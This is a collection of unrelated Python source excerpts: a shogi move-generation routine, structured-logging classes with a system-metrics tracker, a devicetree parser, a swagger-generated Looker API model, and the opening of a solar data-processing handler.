and board.s3d+board.s4d+board.s5d+board.s6d+board.s7d=='':
moves = '2d8d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w9d==''\
and board.s3d+board.s4d+board.s5d+board.s6d+board.s7d+board.s8d=='':
moves = '2d9d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w2d)and Wboard.w4f==''\
and board.s3e=='':
moves = '2d4f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w2d)and Wboard.w5g==''\
and board.s3e+board.s4f=='':
moves = '2d5g'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w2d)and Wboard.w6h==''\
and board.s3e+board.s4f+board.s5g=='':
moves = '2d6h'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w2d)and Wboard.w7i==''\
and board.s3e+board.s4f+board.s5g+board.s6h=='':
moves = '2d7i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w2d)and Wboard.w5a==''\
and board.s4b+board.s3c=='':
moves = '2d5a'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w2d)and Wboard.w4b==''\
and board.s3c=='':
moves = '2d4b'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w2d)and Wboard.w5g==''\
and board.s3e+board.s4f=='':
moves = '2d5g+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w2d)and Wboard.w6h==''\
and board.s3e+board.s4f+board.s5g=='':
moves = '2d6h+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w2d)and Wboard.w7i==''\
and board.s3e+board.s4f+board.s5g+board.s6h=='':
moves = '2d7i+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if Wboard.w3d !='':
if re.match(r'[plsgrk+]', Wboard.w3d)and Wboard.w3e=='':
moves = '3d3e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[sgbk+]', Wboard.w3d)and Wboard.w2e=='':
moves = '3d2e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[sgbk+]', Wboard.w3d)and Wboard.w4e=='':
moves = '3d4e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w3d)and Wboard.w2d=='':
moves = '3d2d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w3d)and Wboard.w4d=='':
moves = '3d4d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w3d)and Wboard.w3c=='':
moves = '3d3c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|\+b|b|s|k',Wboard.w3d)and Wboard.w2c=='':
moves = '3d2c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|\+b|b|s|k',Wboard.w3d)and Wboard.w4c=='':
moves = '3d4c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('n', Wboard.w3d)and Wboard.w2f=='':
moves = '3d2f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('n', Wboard.w3d)and Wboard.w4f=='':
moves = '3d4f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+r', Wboard.w3d)and Wboard.w3i==''\
and board.s3h+board.s3g+board.s3f+board.s3e=='':
moves = '3d3i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w3d)and Wboard.w3i==''\
and board.s3h+board.s3g+board.s3f+board.s3e=='':
moves = '3d3i+'
| |
#!/usr/bin/env python
####################
# Required Modules #
####################
# Generic/Built-in
import logging
import signal
import sys
import time
from multiprocessing import Process
from typing import Dict, List
# Lib
# Custom
from .base import RootLogger
from .config import (
DIRECTOR_NAME_TEMPLATE,
TTP_NAME_TEMPLATE,
WORKER_NAME_TEMPLATE,
SYSMETRICS_NAME_TEMPLATE,
SYSMETRICS_PORT,
DIRECTOR_PORT,
TTP_PORT,
WORKER_PORT
)
from .utils import StructlogUtils
##################
# Configurations #
##################
############################################
# Organisation Core Class - DirectorLogger #
############################################
class DirectorLogger(RootLogger):
def __init__(
self,
logger_name: str,
logging_variant: str = "basic",
server: str = None,
port: int = None,
logging_level: int = logging.INFO,
debugging_fields: bool = False,
filter_functions: List[str] = [],
censor_keys: list = [],
file_path: str = ""
):
# General attributes
# e.g. misc attibutes unique to problem
# Network attributes
# e.g. server IP and/or port number
PORT = port if port else DIRECTOR_PORT
# Data attributes
# e.g participant_id/run_id in specific format
NODE_NAME = DIRECTOR_NAME_TEMPLATE.safe_substitute(name=logger_name)
# Optimisation attributes
# e.g multiprocess/asyncio if necessary for optimisation
# Export Attributes
# e.g. any artifacts that are going to be exported eg Records
super().__init__(
server=server,
port=PORT,
logger_name=NODE_NAME,
logging_level=logging_level,
logging_variant=logging_variant,
debugging_fields=debugging_fields,
filter_functions=filter_functions,
censor_keys=censor_keys,
file_path=file_path
)
#######################################
# Organisation Core Class - TTPLogger #
#######################################
class TTPLogger(RootLogger):
def __init__(
self,
logger_name: str,
logging_variant: str = "basic",
server: str = None,
port: int = None,
logging_level: int = logging.INFO,
debugging_fields: bool = False,
filter_functions: List[str] = [],
censor_keys: list = [],
file_path: str = ""
):
# General attributes
# e.g. misc attibutes unique to problem
# Network attributes
# e.g. server IP and/or port number
PORT = port if port else TTP_PORT
# Data attributes
# e.g participant_id/run_id in specific format
NODE_NAME = TTP_NAME_TEMPLATE.safe_substitute(name=logger_name)
# Optimisation attributes
# e.g multiprocess/asyncio if necessary for optimisation
# Export Attributes
# e.g. any artifacts that are going to be exported eg Records
super().__init__(
server=server,
port=PORT,
logger_name=NODE_NAME,
logging_level=logging_level,
logging_variant=logging_variant,
debugging_fields=debugging_fields,
filter_functions=filter_functions,
censor_keys=censor_keys,
file_path=file_path
)
##########################################
# Organisation Core Class - WorkerLogger #
##########################################
class WorkerLogger(RootLogger):
def __init__(
self,
logger_name: str,
logging_variant: str = "basic",
server: str = None,
port: int = None,
logging_level: int = logging.INFO,
debugging_fields: bool = False,
filter_functions: List[str] = [],
censor_keys: list = [],
file_path: str = "",
):
# General attributes
# e.g. misc attibutes unique to problem
# Network attributes
# e.g. server IP and/or port number
PORT = port if port else WORKER_PORT
# Data attributes
# e.g participant_id/run_id in specific format
NODE_NAME = WORKER_NAME_TEMPLATE.safe_substitute(name=logger_name)
# Optimisation attributes
# e.g multiprocess/asyncio if necessary for optimisation
# Export Attributes
# e.g. any artifacts that are going to be exported eg Records
super().__init__(
server=server,
port=PORT,
logger_name=NODE_NAME,
logging_level=logging_level,
logging_variant=logging_variant,
debugging_fields=debugging_fields,
filter_functions=filter_functions,
censor_keys=censor_keys,
file_path=file_path
)
#############################################
# Organisation Core Class - SysmetricLogger #
#############################################
class SysmetricLogger(RootLogger):
"""
initialise configuration for setting up a logging server using structlog
Attributes:
file_path (str): Path to file storing logging messages (arbitrary Graylog arguments)
server (str): Host address of the logging server e.g. 127.0.0.1 for Graylog
port (int): Port of the logging server e.g. 9000 for graylog
logging_level (int): logging.DEBUG, logging.INFO, logging.WARNING etc..
logger_name (str): Logger ID by name e.g. TTP, worker_1, worker_2
logging_variant: Type of logging to use. There are 2 main options:
1. "default" -> basic logging,
2. "graylog" -> logging to graylog server
Default: "default"
"""
def __init__(
self,
logger_name: str,
logging_variant: str = "basic",
server: str = None,
port: int = None,
logging_level: int = logging.INFO,
debugging_fields: bool = False,
filter_functions: List[str] = [],
censor_keys: list = [],
file_path: str = "",
):
# General attributes
# e.g. misc attibutes unique to problem
# Network attributes
# e.g. server IP and/or port number
PORT = port if port else SYSMETRICS_PORT
# Data attributes
# e.g participant_id/run_id in specific format
NODE_NAME = SYSMETRICS_NAME_TEMPLATE.safe_substitute(name=logger_name)
# Optimisation attributes
# e.g multiprocess/asyncio if necessary for optimisation
self.tracker = None
# Export Attributes
# e.g. any artifacts that are going to be exported eg Records
super().__init__(
server=server,
port=PORT,
logger_name=NODE_NAME,
logging_level=logging_level,
logging_variant=logging_variant,
debugging_fields=debugging_fields,
filter_functions=filter_functions,
censor_keys=censor_keys,
file_path=file_path
)
############
# Checkers #
############
def is_tracking(self) -> bool:
""" Checks if logger is currently tracking to enforce idempotence
Returns:
State (bool)
"""
return self.tracker is not None
###########
# Helpers #
###########
def _configure_processors(self):
""" Overrides parent's _configure_processors() to add in system
tracking filters
Args:
censor_keys (list(callable)):
Returns:
Structlog Processes (list(callable))
"""
structlog_utils = StructlogUtils(
censor_keys=self.censor_keys,
file_path=self.file_path
)
track_cpu_stats = structlog_utils.track_cpu_stats
track_memory_stats = structlog_utils.track_memory_stats
track_disk_stats = structlog_utils.track_disk_stats
track_network_stats = structlog_utils.track_network_stats
###########################
# Implementation Footnote #
###########################
# [Cause]
# In Structlog, a processor is a callable object that executes a
# certain action upon a given event_dict input, and returns an
# augmented event_dict as output. As such, a Structlog processor chain
# is formed and parsed in order and sequentially.
#
# eg.
# wrapped_logger.msg(
# f4(
# wrapped_logger, "msg",
# f3(
# wrapped_logger, "msg",
# f2(
# wrapped_logger, "msg",
# f1(
# wrapped_logger, "msg",
# {"event": "some_event", "x": 42, "y": 23}
# )
# )
# )
# )
# )
#
# More details on this can be found at:
# https://www.structlog.org/en/stable/processors.html?highlight=chain
# [Problems]
# However, a custom processor handling PyGelf compatibility will
# have an asymmetric output w.r.t other processors, and thus cannot be
# used as inputs to a subsequent processor downstream. The generic
# processors procured from the parent class terminates with such a
# process.
# [Solution]
# Ensure that generic processors procured from the parent class are
# ALWAYS appended at the back of the processor list, ensuring that the
# custom PyGelf processor is ALWAYS the final processor executed.
generic_processors = super()._configure_processors()
hardware_processors = [
track_cpu_stats,
track_memory_stats,
track_disk_stats,
track_network_stats
]
all_processors = hardware_processors + generic_processors
return all_processors
def _exit(self, signnum: str, frame) -> None:
""" Exit signal to terminate system tracking
Args:
signame (str): Signal recieved
"""
signame = signal.Signals(signnum).name
self.synlog.info(
f"Signal {signame} of code {signnum} on {frame} has been received.",
signame=signame,
signnum=signnum
)
# Zero is considered “successful termination” and any nonzero value is
# considered “abnormal termination” by shells and the like.
self.synlog.info("Sysmetric operations stopped.")
sys.exit(0)
def _probe(
self,
resolution: int = 1,
descriptors: Dict[str, str] = {},
) -> None:
""" Polls and logs hardware statistics in the background at a specified
regular interval. Current statistics supported include:
1) CPU load percentage
2) Memory total
3) Memory available
4) Memory used
5) Memory free
6) Disk read count
7) Disk write count
8) Disk read bytes
9) Disk write bytes
10) Network bytes sent
11) Network bytes receieved
12) Network packets sent
13) Network packets receieved
Args:
resolution (int): Polling interval in seconds. Default: 1
descriptors (dict(str, str)): Localisation descriptors identifying
the current running source code segment. Default: {}
"""
self.synlog.info(
"Probed system's hardware usage successfully.",
resolution=resolution,
**descriptors
)
time.sleep(resolution)
##################
# Core Functions #
##################
def track(
self,
file_path: str,
class_name: str,
function_name: str,
resolution: int = 1,
**kwargs
):
""" Commences periodic polling and logging of hardware stats of the
current system.
Args:
component: Synergos component either TTP or Worker for the
HardwareStatsLogger, config.TTP or config.WORKER
file_path: The location of the file path that call this function
Returns:
Process (subprocess.Popen object)
"""
def target(descriptors: Dict[str, str]) -> None:
""" Triggers periodic probe for hardware statistics, incorporating
custom localisation descriptors into the logs
Args:
descriptors (dict(str, str)):
"""
# Terminate process when one of the following signal is received
DEFAULT_SIGNALS = ('SIGINT', 'SIGTERM')
for signame in DEFAULT_SIGNALS:
signal_code = getattr(signal, signame)
signal.signal(signal_code, self._exit)
while True:
self._probe(resolution=resolution, descriptors=descriptors)
if not self.is_tracking():
self.initialise()
descriptors = {
"ID_path": file_path,
"ID_class": class_name,
"ID_function": function_name,
**kwargs
}
self.tracker = Process(target=target, args=(descriptors,))
self.tracker.daemon = True
self.tracker.start()
return self.tracker
def terminate(self) | |
self.node.dt.filename,
self))
return self.node.dt.phandle2node[int.from_bytes(self.value, "big")]
def to_nodes(self):
"""
Returns a list with the Nodes the phandles in the property point to.
Raises DTError if the property value contains anything other than
phandles. All of the following are accepted:
foo = < >
foo = < &bar >;
foo = < &bar &baz ... >;
foo = < &bar ... >, < &baz ... >;
"""
def type_ok():
if self.type in (TYPE_PHANDLE, TYPE_PHANDLES):
return True
# Also accept 'foo = < >;'
return self.type is TYPE_NUMS and not self.value
if not type_ok():
_err("expected property '{0}' on {1} in {2} to be assigned with "
"'{0} = < &foo &bar ... >;', not '{3}'"
.format(self.name, self.node.path,
self.node.dt.filename, self))
return [self.node.dt.phandle2node[int.from_bytes(self.value[i:i + 4],
"big")]
for i in range(0, len(self.value), 4)]
def to_path(self):
"""
Returns the Node referenced by the path stored in the property.
Raises DTError if the property was not assigned with either of these
syntaxes (has Property.type TYPE_PATH or TYPE_STRING):
foo = &bar;
foo = "/bar";
For the second case, DTError is raised if the path does not exist.
"""
if self.type not in (TYPE_PATH, TYPE_STRING):
_err("expected property '{0}' on {1} in {2} to be assigned with "
"either '{0} = &foo' or '{0} = \"/path/to/node\"', not '{3}'"
.format(self.name, self.node.path, self.node.dt.filename,
self))
try:
path = self.value.decode("utf-8")[:-1]
except UnicodeDecodeError:
_err("value of property '{}' ({}) on {} in {} is not valid UTF-8"
.format(self.name, self.value, self.node.path,
self.node.dt.filename))
try:
return self.node.dt.get_node(path)
except DTError:
_err("property '{}' on {} in {} points to the non-existent node "
"\"{}\"".format(self.name, self.node.path,
self.node.dt.filename, path))
@property
def type(self):
"""
See the class docstring.
"""
# Data labels (e.g. 'foo = label: <3>') are irrelevant, so filter them
# out
types = [marker[1] for marker in self._markers
if marker[1] != _REF_LABEL]
if not types:
return TYPE_EMPTY
if types == [_TYPE_UINT8]:
return TYPE_BYTES
if types == [_TYPE_UINT32]:
return TYPE_NUM if len(self.value) == 4 else TYPE_NUMS
# Treat 'foo = <1 2 3>, <4 5>, ...' as TYPE_NUMS too
if set(types) == {_TYPE_UINT32}:
return TYPE_NUMS
if set(types) == {_TYPE_STRING}:
return TYPE_STRING if len(types) == 1 else TYPE_STRINGS
if types == [_REF_PATH]:
return TYPE_PATH
if types == [_TYPE_UINT32, _REF_PHANDLE] and len(self.value) == 4:
return TYPE_PHANDLE
if set(types) == {_TYPE_UINT32, _REF_PHANDLE}:
if len(self.value) == 4*types.count(_REF_PHANDLE):
# Array with just phandles in it
return TYPE_PHANDLES
# Array with both phandles and numbers
return TYPE_PHANDLES_AND_NUMS
return TYPE_COMPOUND
def __str__(self):
s = "".join(label + ": " for label in self.labels) + self.name
if not self.value:
return s + ";"
s += " ="
for i, (pos, marker_type, ref) in enumerate(self._markers):
if i < len(self._markers) - 1:
next_marker = self._markers[i + 1]
else:
next_marker = None
# End of current marker
end = next_marker[0] if next_marker else len(self.value)
if marker_type is _TYPE_STRING:
# end - 1 to strip off the null terminator
s += ' "{}"'.format(_decode_and_escape(
self.value[pos:end - 1]))
if end != len(self.value):
s += ","
elif marker_type is _REF_PATH:
s += " &" + ref
if end != len(self.value):
s += ","
else:
# <> or []
if marker_type is _REF_LABEL:
s += " {}:".format(ref)
elif marker_type is _REF_PHANDLE:
s += " &" + ref
pos += 4
# Subtle: There might be more data between the phandle and
# the next marker, so we can't 'continue' here
else: # marker_type is _TYPE_UINT*
elm_size = _TYPE_TO_N_BYTES[marker_type]
s += _N_BYTES_TO_START_STR[elm_size]
while pos != end:
num = int.from_bytes(self.value[pos:pos + elm_size],
"big")
if elm_size == 1:
s += " {:02X}".format(num)
else:
s += " " + hex(num)
pos += elm_size
if pos != 0 and \
(not next_marker or
next_marker[1] not in (_REF_PHANDLE, _REF_LABEL)):
s += _N_BYTES_TO_END_STR[elm_size]
if pos != len(self.value):
s += ","
return s + ";"
def __repr__(self):
return "<Property '{}' at '{}' in '{}'>" \
.format(self.name, self.node.path, self.node.dt.filename)
#
# Internal functions
#
def _add_marker(self, marker_type, data=None):
# Helper for registering markers in the value that are processed after
# parsing. See _fixup_props(). 'marker_type' identifies the type of
# marker, and 'data' has any optional data associated with the marker.
# len(self.value) gives the current offset. This function is called
# while the value is built. We use a list instead of a tuple to be able
# to fix up offsets later (they might increase if the value includes
# path references, e.g. 'foo = &bar, <3>;', which are expanded later).
self._markers.append([len(self.value), marker_type, data])
# For phandle references, add a dummy value with the same length as a
# phandle. This is handy for the length check in _register_phandles().
if marker_type is _REF_PHANDLE:
self.value += b"\0\0\0\0"
#
# Public functions
#
def to_num(data, length=None, signed=False):
"""
Converts the 'bytes' array 'data' to a number. The value is expected to be
in big-endian format, which is standard in devicetree.
length (default: None):
The expected length of the value in bytes, as a simple type check. If
None, the length check is skipped.
signed (default: False):
If True, the value will be interpreted as signed rather than unsigned.
"""
_check_is_bytes(data)
if length is not None:
_check_length_positive(length)
if len(data) != length:
_err("{} is {} bytes long, expected {}"
.format(data, len(data), length))
return int.from_bytes(data, "big", signed=signed)
def to_nums(data, length=4, signed=False):
"""
Like Property.to_nums(), but takes an arbitrary 'bytes' array. The values
are assumed to be in big-endian format, which is standard in devicetree.
"""
_check_is_bytes(data)
_check_length_positive(length)
if len(data) % length:
_err("{} is {} bytes long, expected a length that's a a multiple of {}"
.format(data, len(data), length))
return [int.from_bytes(data[i:i + length], "big", signed=signed)
for i in range(0, len(data), length)]
#
# Public constants
#
# See Property.type
TYPE_EMPTY = 0
TYPE_BYTES = 1
TYPE_NUM = 2
TYPE_NUMS = 3
TYPE_STRING = 4
TYPE_STRINGS = 5
TYPE_PATH = 6
TYPE_PHANDLE = 7
TYPE_PHANDLES = 8
TYPE_PHANDLES_AND_NUMS = 9
TYPE_COMPOUND = 10
def _check_is_bytes(data):
if not isinstance(data, bytes):
_err("'{}' has type '{}', expected 'bytes'"
.format(data, type(data).__name__))
def _check_length_positive(length):
if length < 1:
_err("'length' must be greater than zero, was " + str(length))
def _append_no_dup(lst, elm):
# Appends 'elm' to 'lst', but only if it isn't already in 'lst'. Lets us
# preserve order, which a set() doesn't.
if elm not in lst:
lst.append(elm)
def _decode_and_escape(b):
# Decodes the 'bytes' array 'b' as UTF-8 and backslash-escapes special
# characters
# Hacky but robust way to avoid double-escaping any '\' spit out by
# 'backslashreplace' bytes.translate() can't map to more than a single
# byte, but str.translate() can map to more than one character, so it's
# nice here. There's probably a nicer way to do this.
return b.decode("utf-8", "surrogateescape") \
.translate(_escape_table) \
.encode("utf-8", "surrogateescape") \
.decode("utf-8", "backslashreplace")
def _root_and_path_to_node(cur, path, fullpath):
# Returns the node pointed at by 'path', relative to the Node 'cur'. For
# example, if 'cur' has path /foo/bar, and 'path' is "baz/qaz", then the
# node with path /foo/bar/baz/qaz is returned. 'fullpath' is the path as
# given in the .dts file, for error messages.
for component in path.split("/"):
# Collapse multiple / in a row, and allow a / at the end
if not component:
continue
if component not in cur.nodes:
_err("component '{}' in path '{}' does not exist"
.format(component, fullpath))
cur = cur.nodes[component]
return cur
def _err(msg):
raise DTError(msg)
_escape_table = str.maketrans({
"\\": "\\\\",
'"': '\\"',
"\a": "\\a",
"\b": "\\b",
"\t": "\\t",
"\n": "\\n",
"\v": "\\v",
"\f": "\\f",
"\r": "\\r"})
class DTError(Exception):
"Exception raised for devicetree-related errors"
_Token = collections.namedtuple("Token", "id val")
# Lexer states
_DEFAULT = 0
_EXPECT_PROPNODENAME = 1
_EXPECT_BYTE = 2
_num_re = re.compile(r"(0[xX][0-9a-fA-F]+|[0-9]+)(?:ULL|UL|LL|U|L)?")
# A leading \ is allowed property and node names, probably to allow weird node
# names that would clash with other stuff
_propnodename_re = re.compile(r"\\?([a-zA-Z0-9,._+*#?@-]+)")
# Misc. tokens that are tried after a property/node name. This is important, as
# there's overlap with the allowed characters in names.
_misc_re = re.compile(
"|".join(re.escape(pat) for pat in (
"==", "!=", "!", "=", ",", ";", "+", "-", "*", "/", "%", "~", "?", ":",
"^", "(", ")", "{", "}", "[", "]", "<<", "<=", "<", ">>", ">=", ">",
"||", "|", "&&", "&")))
_byte_re = re.compile(r"[0-9a-fA-F]{2}")
# Matches | |
# coding: utf-8
"""
Experimental Looker API 3.1 Preview
This API 3.1 is in active development. Breaking changes are likely to occur to some API functions in future Looker releases until API 3.1 is officially launched and upgraded to beta status. If you have time and interest to experiment with new or modified services exposed in this embryonic API 3.1, we welcome your participation and feedback! For large development efforts or critical line-of-business projects, we strongly recommend you stick with the API 3.0 while API 3.1 is under construction. # noqa: E501
OpenAPI spec version: 3.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class LookmlModelExploreFieldMapLayer(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'url': 'str',
'feature_key': 'str',
'property_key': 'str',
'property_label_key': 'str',
'projection': 'str',
'format': 'str',
'extents_json_url': 'str',
'max_zoom_level': 'int',
'min_zoom_level': 'int'
}
attribute_map = {
'url': 'url',
'feature_key': 'feature_key',
'property_key': 'property_key',
'property_label_key': 'property_label_key',
'projection': 'projection',
'format': 'format',
'extents_json_url': 'extents_json_url',
'max_zoom_level': 'max_zoom_level',
'min_zoom_level': 'min_zoom_level'
}
def __init__(self, url=None, feature_key=None, property_key=None, property_label_key=None, projection=None, format=None, extents_json_url=None, max_zoom_level=None, min_zoom_level=None): # noqa: E501
"""LookmlModelExploreFieldMapLayer - a model defined in Swagger""" # noqa: E501
self._url = None
self._feature_key = None
self._property_key = None
self._property_label_key = None
self._projection = None
self._format = None
self._extents_json_url = None
self._max_zoom_level = None
self._min_zoom_level = None
self.discriminator = None
if url is not None:
self.url = url
if feature_key is not None:
self.feature_key = feature_key
if property_key is not None:
self.property_key = property_key
if property_label_key is not None:
self.property_label_key = property_label_key
if projection is not None:
self.projection = projection
if format is not None:
self.format = format
if extents_json_url is not None:
self.extents_json_url = extents_json_url
if max_zoom_level is not None:
self.max_zoom_level = max_zoom_level
if min_zoom_level is not None:
self.min_zoom_level = min_zoom_level
@property
def url(self):
"""Gets the url of this LookmlModelExploreFieldMapLayer. # noqa: E501
URL to the map layer resource. # noqa: E501
:return: The url of this LookmlModelExploreFieldMapLayer. # noqa: E501
:rtype: str
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this LookmlModelExploreFieldMapLayer.
URL to the map layer resource. # noqa: E501
:param url: The url of this LookmlModelExploreFieldMapLayer. # noqa: E501
:type: str
"""
self._url = url
@property
def feature_key(self):
"""Gets the feature_key of this LookmlModelExploreFieldMapLayer. # noqa: E501
Specifies the name of the TopoJSON object that the map layer references. If not specified, use the first object.. # noqa: E501
:return: The feature_key of this LookmlModelExploreFieldMapLayer. # noqa: E501
:rtype: str
"""
return self._feature_key
@feature_key.setter
def feature_key(self, feature_key):
"""Sets the feature_key of this LookmlModelExploreFieldMapLayer.
Specifies the name of the TopoJSON object that the map layer references. If not specified, use the first object.. # noqa: E501
:param feature_key: The feature_key of this LookmlModelExploreFieldMapLayer. # noqa: E501
:type: str
"""
self._feature_key = feature_key
@property
def property_key(self):
"""Gets the property_key of this LookmlModelExploreFieldMapLayer. # noqa: E501
Selects which property from the TopoJSON data to plot against. TopoJSON supports arbitrary metadata for each region. When null, the first matching property should be used. # noqa: E501
:return: The property_key of this LookmlModelExploreFieldMapLayer. # noqa: E501
:rtype: str
"""
return self._property_key
@property_key.setter
def property_key(self, property_key):
"""Sets the property_key of this LookmlModelExploreFieldMapLayer.
Selects which property from the TopoJSON data to plot against. TopoJSON supports arbitrary metadata for each region. When null, the first matching property should be used. # noqa: E501
:param property_key: The property_key of this LookmlModelExploreFieldMapLayer. # noqa: E501
:type: str
"""
self._property_key = property_key
@property
def property_label_key(self):
"""Gets the property_label_key of this LookmlModelExploreFieldMapLayer. # noqa: E501
Which property from the TopoJSON data to use to label the region. When null, property_key should be used. # noqa: E501
:return: The property_label_key of this LookmlModelExploreFieldMapLayer. # noqa: E501
:rtype: str
"""
return self._property_label_key
@property_label_key.setter
def property_label_key(self, property_label_key):
"""Sets the property_label_key of this LookmlModelExploreFieldMapLayer.
Which property from the TopoJSON data to use to label the region. When null, property_key should be used. # noqa: E501
:param property_label_key: The property_label_key of this LookmlModelExploreFieldMapLayer. # noqa: E501
:type: str
"""
self._property_label_key = property_label_key
@property
def projection(self):
"""Gets the projection of this LookmlModelExploreFieldMapLayer. # noqa: E501
The preferred geographic projection of the map layer when displayed in a visualization that supports multiple geographic projections. # noqa: E501
:return: The projection of this LookmlModelExploreFieldMapLayer. # noqa: E501
:rtype: str
"""
return self._projection
@projection.setter
def projection(self, projection):
"""Sets the projection of this LookmlModelExploreFieldMapLayer.
The preferred geographic projection of the map layer when displayed in a visualization that supports multiple geographic projections. # noqa: E501
:param projection: The projection of this LookmlModelExploreFieldMapLayer. # noqa: E501
:type: str
"""
self._projection = projection
@property
def format(self):
"""Gets the format of this LookmlModelExploreFieldMapLayer. # noqa: E501
Specifies the data format of the region information. Valid values are: \"topojson\", \"vector_tile_region\". # noqa: E501
:return: The format of this LookmlModelExploreFieldMapLayer. # noqa: E501
:rtype: str
"""
return self._format
@format.setter
def format(self, format):
"""Sets the format of this LookmlModelExploreFieldMapLayer.
Specifies the data format of the region information. Valid values are: \"topojson\", \"vector_tile_region\". # noqa: E501
:param format: The format of this LookmlModelExploreFieldMapLayer. # noqa: E501
:type: str
"""
self._format = format
@property
def extents_json_url(self):
"""Gets the extents_json_url of this LookmlModelExploreFieldMapLayer. # noqa: E501
Specifies the URL to a JSON file that defines the geographic extents of each region available in the map layer. This data is used to automatically center the map on the available data for visualization purposes. The JSON file must be a JSON object where the keys are the mapping value of the feature (as specified by property_key) and the values are arrays of four numbers representing the west longitude, south latitude, east longitude, and north latitude extents of the region. The object must include a key for every possible value of property_key. # noqa: E501
:return: The extents_json_url of this LookmlModelExploreFieldMapLayer. # noqa: E501
:rtype: str
"""
return self._extents_json_url
@extents_json_url.setter
def extents_json_url(self, extents_json_url):
"""Sets the extents_json_url of this LookmlModelExploreFieldMapLayer.
Specifies the URL to a JSON file that defines the geographic extents of each region available in the map layer. This data is used to automatically center the map on the available data for visualization purposes. The JSON file must be a JSON object where the keys are the mapping value of the feature (as specified by property_key) and the values are arrays of four numbers representing the west longitude, south latitude, east longitude, and north latitude extents of the region. The object must include a key for every possible value of property_key. # noqa: E501
:param extents_json_url: The extents_json_url of this LookmlModelExploreFieldMapLayer. # noqa: E501
:type: str
"""
self._extents_json_url = extents_json_url
@property
def max_zoom_level(self):
"""Gets the max_zoom_level of this LookmlModelExploreFieldMapLayer. # noqa: E501
The minimum zoom level that the map layer may be displayed at, for visualizations that support zooming. # noqa: E501
:return: The max_zoom_level of this LookmlModelExploreFieldMapLayer. # noqa: E501
:rtype: int
"""
return self._max_zoom_level
@max_zoom_level.setter
def max_zoom_level(self, max_zoom_level):
"""Sets the max_zoom_level of this LookmlModelExploreFieldMapLayer.
The minimum zoom level that the map layer may be displayed at, for visualizations that support zooming. # noqa: E501
:param max_zoom_level: The max_zoom_level of this LookmlModelExploreFieldMapLayer. # noqa: E501
:type: int
"""
self._max_zoom_level = max_zoom_level
@property
def min_zoom_level(self):
"""Gets the min_zoom_level of this LookmlModelExploreFieldMapLayer. # noqa: E501
The maximum zoom level that the map layer may be displayed at, for visualizations that support zooming. # noqa: E501
:return: The min_zoom_level of this LookmlModelExploreFieldMapLayer. # noqa: E501
:rtype: int
"""
return self._min_zoom_level
@min_zoom_level.setter
def min_zoom_level(self, min_zoom_level):
"""Sets the min_zoom_level of this LookmlModelExploreFieldMapLayer.
The maximum zoom level that the map layer may be displayed at, for visualizations | |
# -*- coding: utf-8 -*-
''' Data Handler Module
This module contains a class for managing a data processing pipeline
'''
from time import time
from datetime import timedelta
import numpy as np
import pandas as pd
from scipy.stats import mode, skew
from scipy.interpolate import interp1d
from sklearn.cluster import DBSCAN
import cvxpy as cvx
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
from solardatatools.time_axis_manipulation import make_time_series,\
standardize_time_axis
from solardatatools.matrix_embedding import make_2d
from solardatatools.data_quality import daily_missing_data_advanced
from solardatatools.data_filling import zero_nighttime, interp_missing
from solardatatools.clear_day_detection import find_clear_days
from solardatatools.plotting import plot_2d
from solardatatools.clear_time_labeling import find_clear_times
from solardatatools.solar_noon import avg_sunrise_sunset
from solardatatools.algorithms import CapacityChange, TimeShift, SunriseSunset
class DataHandler():
def __init__(self, data_frame=None, raw_data_matrix=None, datetime_col=None,
convert_to_ts=False, aggregate=None, how=lambda x: x.mean()):
if data_frame is not None:
if convert_to_ts:
data_frame, keys = make_time_series(data_frame)
self.keys = keys
else:
self.keys = list(data_frame.columns)
self.data_frame_raw = data_frame.copy()
if not isinstance(self.data_frame_raw.index, pd.DatetimeIndex):
if datetime_col is not None:
df = self.data_frame_raw
df[datetime_col] = pd.to_datetime(df[datetime_col])
df.set_index(datetime_col, inplace=True)
else:
e = "Data frame must have a DatetimeIndex or"
e += "the user must set the datetime_col kwarg."
raise Exception(e)
df_index = self.data_frame_raw.index
if df_index.tz is not None:
df_index = df_index.tz_localize(None)
self.data_frame = None
if aggregate is not None:
new_data = how(self.data_frame_raw.resample(aggregate))
self.data_frame_raw = new_data
else:
self.data_frame_raw = None
self.data_frame = None
self.keys = None
self.raw_data_matrix = raw_data_matrix
if self.raw_data_matrix is not None:
